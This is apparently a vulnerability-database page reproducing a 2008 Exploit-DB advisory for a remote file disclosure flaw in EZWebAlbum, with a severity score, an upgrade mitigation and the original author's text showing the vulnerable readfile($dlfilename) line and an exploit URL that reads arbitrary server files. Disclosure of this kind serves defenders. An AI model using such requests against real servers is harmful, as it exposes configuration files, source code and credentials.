EZWebAlbum (dlfilename) Remote File Disclosure Vulnerability

vendor:

EZWebAlbum

by:

Ghost Hacker [ R-H TeaM ]

7.5

CVSS

HIGH

Remote File Disclosure

200

CWE

Product Name: EZWebAlbum

Affected Version From: N/A

Affected Version To: N/A

Patch Exists: YES

Related CWE: N/A

CPE: N/A

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: N/A

2008

EZWebAlbum (dlfilename) Remote File Disclosure Vulnerability

EZWebAlbum is vulnerable to a remote file disclosure vulnerability. An attacker can exploit this vulnerability by sending a malicious HTTP request to the vulnerable server. The malicious request contains a parameter named 'dlfilename' which can be used to read any file on the server. This can be exploited to read sensitive files such as configuration files, source code, etc.

Mitigation:

Upgrade to the latest version of EZWebAlbum.

Source

Exploit-DB raw data:

##################################################################################################
 EZWebAlbum (dlfilename) Remote File Disclosure Vulnerability     |,  .-.  .-.  ,|
 Found by : Ghost Hacker [ R-H TeaM ]                             | )(_o/  \o_)( |
 My Site web : Real-hack.Net                                      |/     /\     \|
##################################################################################################
[~] Found by : Ghost Hacker [ R-H TeaM ]
[~] Home page : www.Real-hack.net
[~] Email : Ghost-r00t@Hotmail.com
[~] Name Script : EZWebAlbum
[~] Download Script : http://sourceforge.net/projects/ezwebalbum
###################################### [ Viva IslaM & KSA ] ######################################
[~] Error (download.php) :
readfile($dlfilename);

[~] Exploit :
http://xxxx/[path]/download.php?dlfilename=EVIL
[~] Example :
http://xxxx/[path]/download.php?dlfilename=index.php
###################################### [ Viva IslaM & KSA ] ######################################
[~] Greetz :
PROTO & QaTaR BoeZ TeaM & Aseg-Rabe7 & Dmar al3noOoz & 4Bo3tB & LeGeNd HaCkEr & Root Hacker ..
Qptan & ScarY.HaCkEr & EgYpTiaNxHaCkEr the-pirate.org & Mr.hope & My Blog[ gh0st10.wordpress.com ]
All Members Real Hack And All My Friends ..
##################################################################################################
 Found by : Ghost Hacker [ R-H TeaM ]
##################################################################################################

# milw0rm.com [2008-07-21]